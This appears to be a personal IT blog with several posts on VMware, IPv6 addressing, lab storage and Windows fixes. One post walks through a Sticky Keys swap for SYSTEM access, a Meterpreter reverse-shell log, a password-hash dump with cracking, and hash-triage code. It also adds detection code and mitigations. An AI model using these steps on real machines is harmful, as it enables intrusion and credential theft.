P2V the VMware way

26 01 2012

VMware converter standalone is a free download:

http://www.vmware.com/products/converter/

Gotchas:
“Insufficient permissions to connect to \\xxxxxxx\ADMIN$” for the Windows XP machine you are trying to convert

run gpedit.msc

– Computer Configuration

 – Windows Settings

  – Security Settings

   – Local Policies

    – Security Option

     – Network access: Sharing and security model for local accounts

 

By default XP (when not joined to a domain) has the Sharing and security model for local accounts set to “Guest only – local users authenticate as Guest”, so a remote connection with the local Administrator account is mapped to Guest and cannot open ADMIN$. This needs to be changed to “Classic – local users authenticate as themselves”. The setting is backed by the registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ForceGuest (1 = Guest only, 0 = Classic) if you would rather script it.

This way you can access the machine remotely with the admin account & do the conversion. The admin account needs a non-blank password, because XP also refuses network logons for blank-password accounts by default. Note that in Classic mode any local account with a password can now be used for a remote logon with its real privileges, so put the setting back to Guest only once the conversion is done if the source machine stays on the network.





Disable Windows 7 IPv6 random temporary addresses

4 08 2011

One of the added security features with IPv6 addressing is “Temporary address interface identifiers”

https://isc.sans.edu/diary.html?storyid=10966

Many operating systems use the EUI-64 algorithm to generate IPv6 addresses. This algorithm derives the last 64 bits of the IPv6 address using the MAC address. Many see this as a privacy problem. The last half of your IP address will never change, and with MAC addresses being somewhat unique, the interface ID becomes close to a unique “cookie” identifying your system.

As a result, RFC3041 introduces “privacy enhanced” addresses which will change and are created by hashing the MAC address.

*NOTE: Default behaviour of Windows XP & Server 2003 does not use the randomization*

What this means from an administration perspective is that the temporary address the host uses for outbound connections changes after every reboot (and, after its preferred lifetime expires, without one), which makes things like DNS / FW rules etc a nightmare to manage in a corporate / enterprise scenario where you really need a stable addressing scheme.

I have a /52 IPv6 subnet through a tunnel broker. My border firewall terminates the tunnel & advertises the subnet on the inside interface for autoconfiguration (without having to configure DHCP)

So, let's break it down.

I get a /52 subnet, which is advertised to my internal machines.

aaaa:bbbb:cccc:dddd::/56

In the default Windows 7 configuration the interface identifier is randomized (not based on the MAC), which you can see first in the link-local address:

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
Link-local IPv6 Address . . . . . : fe80::d95:67db:fba2:7dad%11(Preferred)

Using stateless autoconfiguration I get a global address from the /64 prefix my FW advertises, built from the same interface identifier as the link-local address:

IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:d95:67db:fba2:7dad(Preferred)

Excellent – we have a global / routable IPv6 address based on the host’s link local address which I can now use.

However, Windows isn't done yet: it also assigns a Temporary IPv6 address, and that is the one it prefers as the source address for outbound connections. The temporary address is only kept for a set period and changes when the machine reboots, and here is the problem: how do I write a firewall rule for this host to reach an external resource?

Here is the result of several reboots:

Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a5cb:b012:16f0:6fa9
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:ec65:b6ca:abd6:1349
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:752b:87c:f84:a4d6
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:1031:46fd:cfd7:d88c
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:5883:7ef2:9c64:6eab
Temporary IPv6 Address. . . . . . : aaaa:bbbb:cccc:dddd:a400:251a:59:1cd6:bf0f

You can disable both the temporary addresses and the randomized identifier, and just use the MAC-based EUI-64 address, by running the following commands.

Bring up a command prompt in administrator mode (Start -> All Programs -> Accessories -> Right click on Command Prompt, run as Administrator)

Then run these commands (each should return OK). The store=active ones take effect immediately, the store=persistent ones survive the reboot:

netsh interface ipv6 set privacy state=disabled store=active
netsh interface ipv6 set privacy state=disabled store=persistent
netsh interface ipv6 set global randomizeidentifiers=disabled store=active
netsh interface ipv6 set global randomizeidentifiers=disabled store=persistent

Restart your machine

Your machine should now get a stable IPv6 address derived from its MAC address. You can use this address for DNS entries, FW rules etc, and it will stay the same across reboots.

Autoconfiguration Enabled . . . . : Yes
Physical Address. . . . . . . . . : 00-0C-29-88-9F-2A
IPv6 Address. . . . . . . . . . . : aaaa:bbbb:cccc:dddd:20c:29ff:fe88:9f2a(Preferred)
Link-local IPv6 Address . . . . . : fe80::20c:29ff:fe88:9f2a%10(Preferred)

Excellent – we have a global / routable IPv6 address based on the host's MAC address which I can now use, and the link-local address now carries the same EUI-64 identifier.

A note on the addressing: in this mode the 64-bit interface identifier is derived from the 48-bit MAC address (modified EUI-64). The MAC 00:1D:BA:06:37:64 is split after the OUI, FF:FE is inserted in the middle, and the universal/local bit (0x02) of the first octet is flipped: 02:1D:BA:FF:FE:06:37:64. The whole MAC is used regardless of the size of your prefix; in the output above 00-0C-29-88-9F-2A becomes 020c:29ff:fe88:9f2a, which ipconfig prints with the leading zero dropped as 20c:29ff:fe88:9f2a. The trade-off is the one the ISC diary describes: every packet this host sends now carries its MAC, vendor OUI included, and it will be recognisable as the same machine on any network it joins.
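To make the derivation concrete, here is an added example (not code from the original post) that builds the SLAAC address from the MAC shown in the ipconfig output above, and does the reverse, reading the MAC back out of an address. It assumes the prefix advertised on the LAN is aaaa:bbbb:cccc:dddd::/64, the /64 the addresses above sit in; the MACs are the two quoted in the post.

```python
"""EUI-64 interface identifiers, as used once randomizeidentifiers is disabled.

Added example, not code from the original post.  Assumes the LAN prefix is
aaaa:bbbb:cccc:dddd::/64; the MACs are the two quoted in the post.
"""
import ipaddress


def mac_to_eui64(mac: str) -> bytes:
    """Turn a 48-bit MAC into its 64-bit modified EUI-64 interface identifier."""
    octets = bytes.fromhex(mac.replace("-", "").replace(":", ""))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    # Split the MAC after the OUI and insert FF:FE ...
    eui = octets[:3] + b"\xff\xfe" + octets[3:]
    # ... then flip the universal/local bit (0x02 of the first octet).  That
    # flip is why 00-0C-29-... appears as 20c:29ff:fe88:9f2a, not c:29ff:...
    return bytes([eui[0] ^ 0x02]) + eui[1:]


def slaac_address(prefix: str, mac: str) -> ipaddress.IPv6Address:
    """Combine the advertised /64 with the EUI-64 identifier, as SLAAC does."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("stateless autoconfiguration needs a 64-bit prefix")
    iid = int.from_bytes(mac_to_eui64(mac), "big")
    return ipaddress.IPv6Address(int(net.network_address) | iid)


def mac_from_address(addr: str):
    """Recover the MAC from an EUI-64-based address.

    Returns None when the interface identifier is not EUI-64 shaped, which is
    what the randomized and temporary identifiers above look like."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    first = iid[0] ^ 0x02          # undo the universal/local flip
    mac = bytes([first]) + iid[1:3] + iid[5:]
    return "-".join(f"{b:02X}" for b in mac)


if __name__ == "__main__":
    # The host from the ipconfig output above.
    print(slaac_address("aaaa:bbbb:cccc:dddd::/64", "00-0C-29-88-9F-2A"))
    print(mac_from_address("aaaa:bbbb:cccc:dddd:20c:29ff:fe88:9f2a"))
    # One of the temporary addresses listed above: nothing to recover.
    print(mac_from_address("aaaa:bbbb:cccc:dddd:a5cb:b012:16f0:6fa9"))
```

mac_from_address returning None for the temporary addresses listed earlier is the privacy argument in one line: those identifiers carry no ff:fe marker and no MAC to recover, while the EUI-64 address hands the MAC, OUI included, to anyone who sees a packet from it.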





bigger, better, faster, more VMware

19 07 2011

No, before we even start, this is not a blog post about the 4 Non Blondes album.

This is documentation of my mind-numbing, soul-destroying search for the best-performing configuration with the hardware I have in my lab.

I have spent countless hours / days / weeks building, breaking & rebuilding my VM Lab (thankfully I have an understanding wife & daughter).

Hardware primarily consists of:

2x HP Proliant N36L Microservers (Athlon II Neo Dual Core 1.3) (8GB RAM in one box / 2GB in the other).
2x HP DC7100 Desktops (P4 2.8 / 2GB RAM)
1x Dell Precision 370 (P4 3.0 / 4GB RAM)
Cisco 2950 (24×10/100 + 2×1000)

Add to this an assortment of older F5s / dual-P3 pizza boxes & other no-name kit – and I have a playground full of toys.

I have been using unRAID for the past few years on various hardware platforms. This has been mainly for storing media, ISO’s & providing a backup target for the various laptops & workstations around the house.

Recently I picked up the two HP N36L Microservers; the 8GB one is my primary VMware ESXi 4.1 host and the 2GB server is running unRAID. Just having the second box sitting there running unRAID seems a little under-utilised to me, the disks are in standby most of the time (thanks to Netflix) – and it just hasn't been getting the workout I think it deserves.

So – enter the newest project – what's the best solution for storing media / ISOs / backups / VMs etc? I want to be able to use either iSCSI or NFS to play with vMotion of VMs when I finish building my VMware test lab for my VCP – I want it fast, but I want it protected in case a disk fails.

I have tested & played with the following in my quest:

Storage Systems:
FreeNAS 7 & 8 (Physical & Virtual)
Openfiler (Physical & Virtual)
Nexenta (Physical & Virtual)
unRAID Physical (Virtual not supported due to USB GUID licensing)

Presentation to Client Machines:
Local storage in the ESXi host presented to Windows 7 VM
iSCSI Raw Device Mappings presented to Windows 7 VM
iSCSI Presented to ESXi -> VMFS-3 filesystem -> VMDK presented to Windows 7 VM
iSCSI Presented to Physical Windows 7 Client
NFS Presented to ESXi -> VMDK presented to Windows 7 VM
CIFS/SMB Presented to Physical Windows 7 Client

I have been using a single test scenario on each config – using Iometer – with the file & results formatted from http://vmktree.org/iometer/

First I want to benchtest them for performance, then to setup the best solution that is a mix of performance & redundancy.

Sounds impossible – I'm gonna try.

For the performance benchtesting I decided to go with a 2-spindle ZFS striped config, tested from Windows 7 clients
Physical Client: HP DC7100
Physical FreeNAS: HP N36L (2GB RAM / 1TB WD Green / 2TB WD Green)

I have mismatched sizes as that's the hardware I have free at the moment. If I find a compelling reason why this won't work, then I may get a second 2TB disk to match. I am using WD Green disks for their low power / cooler running – commodity hardware.

Scenario 1 – Physical FreeNAS 7 with iSCSI
Physical Client -> iSCSI on Physical NAS
Virtual Client -> VMDK on ESXi -> iSCSI Physical NAS

Scenario 2 – Physical FreeNAS 7 with NFS & CIFS/SMB
Physical Client -> CIFS/SMB on Physical NAS (Usual windows sharing type scenario)
Virtual Client -> VMDK on ESXi -> NFS Physical NAS

Scenario 3 – Virtualised FreeNAS 7 with iSCSI
* Physical Disks formatted with VMFS-3, with VMDK presented to FreeNAS VM
Physical Client -> iSCSI on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 4 – Virtualised FreeNAS 7 with NFS & CIFS/SMB
* Physical Disks formatted with VMFS-3, with VMDK presented to FreeNAS VM
Physical Client -> CIFS/SMB on Virtual NAS
Virtual Client -> VMDK on ESXi -> NFS Virtual NAS

Scenario 5 – Virtualised FreeNAS 7 with iSCSI
* Physical Disks presented via Physical RDM passthrough to FreeNAS VM
* RDM Config thanks to http://www.vm-help.com/esx40i/SATA_RDMs.php
* RDM passthrough used to enable SMART monitoring from the FreeNAS VM – very cool
Physical Client -> iSCSI on Virtual NAS
Virtual Client -> VMDK on ESXi -> iSCSI Virtual NAS

Scenario 6 – Virtualised FreeNAS 7 with NFS & CIFS/SMB
* Physical Disks presented via Physical RDM passthrough to FreeNAS VM
* RDM Config thanks to http://www.vm-help.com/esx40i/SATA_RDMs.php
* RDM passthrough used to enable SMART monitoring from the FreeNAS VM – very cool
Physical Client -> CIFS/SMB on Virtual NAS
Virtual Client -> VMDK on ESXi -> NFS Virtual NAS

I will be adding follow up posts with the performance results, the PRO’s & CON’s (in my view) with each of these scenarios. Feel free to add comments & kick off discussions about this project.





vsphere client on Windows 7

9 03 2011

So, as it always seems to happen, the few apps you really want to work …. don't.

I loaded up the vSphere client under Windows 7 & it failed to connect to my ESXi host, nor would it connect to my Virtual Centre server.

It just fell in a heap with the following errors ……

“Error parsing the server “server name” “clients.xml” file.”

and

“The type initializer for ‘VirtualInfrastructure.Utils.HttpWebRequestProxy’ threw an exception.”

After much Google trawling, I came across the solution.

  • Create lib folder under the Launcher folder

C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\lib

  • Copy system.dll into the lib folder – the one to use is the copy from the %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ directory of a Windows XP machine with .NET v3.5 SP1 installed.

  • Edit VpxClient.exe.config in the Launcher folder

C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher

The only change in the config file is the addition of the following lines before the closing </configuration> tag:

<runtime>
<developmentMode developerInstallation="true"/>
</runtime>

  • Create a new system environment variable

DEVPATH=C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\lib

  • Set VpxClient.exe to run as an administrator.

If all went well, you should now be able to launch the vSphere client & admin your machines as you did before. One caveat: DEVPATH tells the .NET runtime to load assemblies from that folder ahead of its normal probing and without the usual version checks, so anything dropped into lib ends up inside the client. Only put a system.dll there that you copied yourself from a machine you trust, and remove the variable and the developmentMode setting once you are on a client build that supports Windows 7.





60seconds of physical access = p0wn3d windows machine

27 09 2010

So I came across some interesting articles about getting a shell with system priv on a windows box that you have physical access to …… sounds fun 😀

There are two ways to get this access using existing Windows features. Both involve replacing an accessibility helper executable with cmd.exe (or another exe, but we are just getting a shell for now) and invoking the “helper” via key presses at the login screen; because winlogon launches these helpers before anyone has logged in, they run as SYSTEM, and so does whatever you put in their place.

Shift Key x5 – “Sticky Keys helper”

Most windows machines (Up to & Including Server 2008 / Windows 7 etc) will invoke the StickyKeys helper app when you hit shift 5 times, even at the login prompt.

Reboot your target with your favourite bootable image (BackTrack is my choice, but you can use pretty much anything). Once you are in the distro of choice, you need to mount the target drive, back up the original file and copy in cmd.exe.

Mount the drive (assuming its NTFS) and do the file copying

root@bt:~# mkdir disk
root@bt:~# ntfs-3g /dev/sda1 ./disk
root@bt:~# cd disk
root@bt:~/disk# cd WINDOWS/system32
root@bt:~/disk/WINDOWS/system32# mv sethc.exe sethc.exe.old
root@bt:~/disk/WINDOWS/system32# cp cmd.exe sethc.exe
root@bt:~/disk/WINDOWS/system32# cd
root@bt:~# umount ./disk
root@bt:~# reboot

Of course, while you are at it, you may want to drop your favourite “network tools application” somewhere onto the target drive, so you have something fun to run in a minute, you “could” also setup a machine on the same segment as the target, with a handler ….. but what you do there is up to you.

This time when you are at your Windows login screen, hit Shift 5 times and bingo – a shell, running as SYSTEM.

Now comes the fun part … with your networktool.exe you dropped earlier….

Ooooh calculator …. wonder what that does ….

……. somewhere on another part of the network …… not so far far away ……

msf exploit(handler) >
[*] 172.16.189.137:1029 Request received for /Arf3V...
[*] 172.16.189.137:1029 Staging connection for target rf3V received...
[*] Patching Target ID rf3V into DLL
[*] 172.16.189.137:1030 Request received for /Brf3V...
[*] 172.16.189.137:1030 Stage connection for target rf3V received...
[*] Meterpreter session 2 opened (172.16.189.138:443 -> 172.16.189.137:1030) at 2010-09-27 21:35:10 +1000
[*] Session ID 2 (172.16.189.138:443 -> 172.16.189.137:1030) processing InitialAutoRunScript '/migrate.rb'
[*] Current server process: networktool.exe (996)
[*] Migrating to lsass.exe...
[*] Migrating into process ID 684
[*] New server process: lsass.exe (684)

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ N00B-DB56488C96  172.16.189.138:443 -> 172.16.189.137:1030

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:5c:38:31
IP Address  : 172.16.189.137
Netmask     : 255.255.255.0

meterpreter > sysinfo
Computer: N00B-DB56488C96
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
meterpreter >

Go Here: http://lmcrack.com/index.php

Enter the captured LM hash (the first of the two hashes on the Administrator line – the second is the NT hash): 921988ba001dc8e14a3b108f3fa6cb6d

Get Result: 921988BA001DC8E14A3B108F3FA6CB6D = P@ssw0rd

Login …… p0wn3d
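Reading the hashdump lines is where the decision of what to crack gets made, so here is an added example (not code from the original post) that parses the four lines above in pwdump format (user:RID:LM hash:NT hash:::) and reports what each pair of hashes gives away. The sentinel values are the LM hash of an empty 7-character block and the NT hash of the empty password; the sample is the hashdump output quoted above.

```python
"""Triage of hashdump / pwdump output.  Added example, not part of the
original post; SAMPLE is the four lines dumped above."""

EMPTY_LM_HALF = "aad3b435b51404ee"              # LM of an empty 7-char block
EMPTY_LM = EMPTY_LM_HALF * 2                    # "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

SAMPLE = """\
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ace3901423f8cc34767dbb3ebf316f88:b8491d9c56fc2d8caebdca5b86d96fee:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ff11f2628cb153e32a048dce2344c5ec:::
"""


def parse_pwdump(text):
    """Yield (user, rid, lm, nt) from user:rid:lm:nt::: lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid = parts[0], int(parts[1])
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length in {line!r}")
        yield user, rid, lm, nt


def triage(text):
    """Map each account to a list of findings about its two hashes.

    LM hashes the upper-cased password in two independent 7-character halves,
    so each half cracks on its own, and an empty second half means the
    password is at most 7 characters.  An LM hash is only stored at all for
    passwords of 14 characters or fewer."""
    report = {}
    for user, rid, lm, nt in parse_pwdump(text):
        notes = []
        if nt == EMPTY_NT:
            notes.append("blank password")
        elif lm == EMPTY_LM:
            notes.append("no LM hash stored (NoLMHash set or password longer than 14)")
        else:
            length = "at most 7" if lm[16:] == EMPTY_LM_HALF else "8 to 14"
            notes.append(f"LM hash present, password is {length} characters")
            notes.append(f"crack LM halves {lm[:16]} and {lm[16:]} separately")
        report[user] = notes
    return report


def crackable_lm(text):
    """Accounts worth sending to an LM cracker such as the one used above."""
    return [user for user, notes in triage(text).items()
            if any(n.startswith("LM hash present") for n in notes)]


if __name__ == "__main__":
    for user, notes in triage(SAMPLE).items():
        print(user)
        for note in notes:
            print("   ", note)
```

On this dump the Administrator and HelpAssistant lines are the ones with an LM hash to crack, Guest has a blank password, and SUPPORT_388945a0 has no LM hash at all, so only its NT hash is left to attack.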

Another way to achieve the same goal is with utilman.exe and the Windows Key + U instead of Shift x5. Depending on the security settings locked down on the domain (GPOs) these may or may not work for you – only one way to find out. Both tricks depend on being able to boot something else and write to the system drive, so full-disk encryption (or at the very least a BIOS / boot-order password) is what actually stops them; and the LM hash that made the crack above trivial is only there because XP stores one by default, which the “Do not store LAN Manager hash value on next password change” policy turns off.
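From the defender's side the swap is easy to spot, because the version above leaves sethc.exe byte-identical to cmd.exe with a .old backup beside it. The following is an added example (not code from the original post) that checks the two helpers the post names in a System32 directory, whether the live one or a mounted offline disk, against cmd.exe and, on XP / 2003, against the Windows File Protection copy in dllcache. The tree it runs against here is a constructed sample, not a real Windows installation.

```python
"""Spot accessibility helpers that have been swapped for cmd.exe.

Added example, not code from the original post.  demo_findings() builds a
constructed sample tree so the check can run anywhere; point
find_swapped_helpers() at a real System32 (live, or a mounted offline disk)
to use it for real.
"""
import hashlib
import os
import tempfile

# The two helpers the post abuses: Shift x5 launches sethc.exe, Win+U utilman.exe.
HELPERS = ("sethc.exe", "utilman.exe")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_helpers(system32, helpers=HELPERS):
    """Return (helper, reason) pairs for helpers that look replaced.

    Three signs, none of which needs a known-good hash list:
      - the helper is byte-identical to cmd.exe (the exact swap above),
      - a <helper>.old backup has been left beside it,
      - on XP/2003, it differs from the Windows File Protection copy in
        dllcache, which an offline swap does not update.
    """
    findings = []
    cmd_hash = sha256_of(os.path.join(system32, "cmd.exe"))
    for name in helpers:
        path = os.path.join(system32, name)
        if not os.path.isfile(path):
            continue
        digest = sha256_of(path)
        if digest == cmd_hash:
            findings.append((name, "identical to cmd.exe"))
        if os.path.exists(path + ".old"):
            findings.append((name, "backup copy left behind"))
        cached = os.path.join(system32, "dllcache", name)
        if os.path.isfile(cached) and sha256_of(cached) != digest:
            findings.append((name, "differs from the dllcache copy"))
    return findings


def build_demo_tree(root):
    """Constructed sample (not real binaries): sethc.exe swapped for cmd.exe
    with the backup left behind, utilman.exe no longer matching dllcache."""
    os.makedirs(os.path.join(root, "dllcache"), exist_ok=True)
    files = {
        "cmd.exe": b"MZ cmd",
        "sethc.exe": b"MZ cmd",
        "sethc.exe.old": b"MZ sethc",
        "utilman.exe": b"MZ not utilman",
        os.path.join("dllcache", "utilman.exe"): b"MZ utilman",
    }
    for name, data in files.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(data)
    return root


def demo_findings():
    """Run the check against the constructed tree."""
    return find_swapped_helpers(build_demo_tree(tempfile.mkdtemp()))


if __name__ == "__main__":
    for helper, reason in demo_findings():
        print(f"{helper}: {reason}")
```

The dllcache comparison only applies to XP / 2003, where Windows File Protection keeps that copy; on Vista and later the file simply is not there and the other two checks still apply. An attacker who drops a different binary rather than cmd.exe and deletes the backup defeats the first two signs, which is why comparing against a reference copy, or known-good hashes from an identical build, is the check to keep.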





The Windows 7 Guide: From Newbies To Pros [FREE EBOOK]

7 09 2010

Not overly exciting, but packed with good information for beginning the assault on Windows 7. I have been a long-time Windows user, my main machine is a MacBook, and I have several Linux boxes kicking around also. This free PDF explains a lot of the Windows 7 features, and I'm going to shoot it off to my parents (who are using Vista) to give them a quick overview. For the less technical in our families, this may just be the book of basic answers they need.

The Windows 7 Guide: From Newbies To Pros [FREE EBOOK].





Dissecting the Pass the Hash Attack

28 07 2010

Nice to see an article including BackTrack on the windowsecurity.com list. It's a nice write-up on using BackTrack to pass the hash to psexec and remotely launch a reverse shell. If you haven't read much about using password hashes, this would be a good read. It also links to other articles about gaining access to hashed passwords, from physical box access to various tools.

In this article we will look at how this technique works and I will demonstrate the process that can be used to take stolen password hashes and use them successfully without having to crack their hidden contents. As always, I will cover some detection and defensive techniques on how you can prevent yourself from falling victim to this attack.

via Dissecting the Pass the Hash Attack.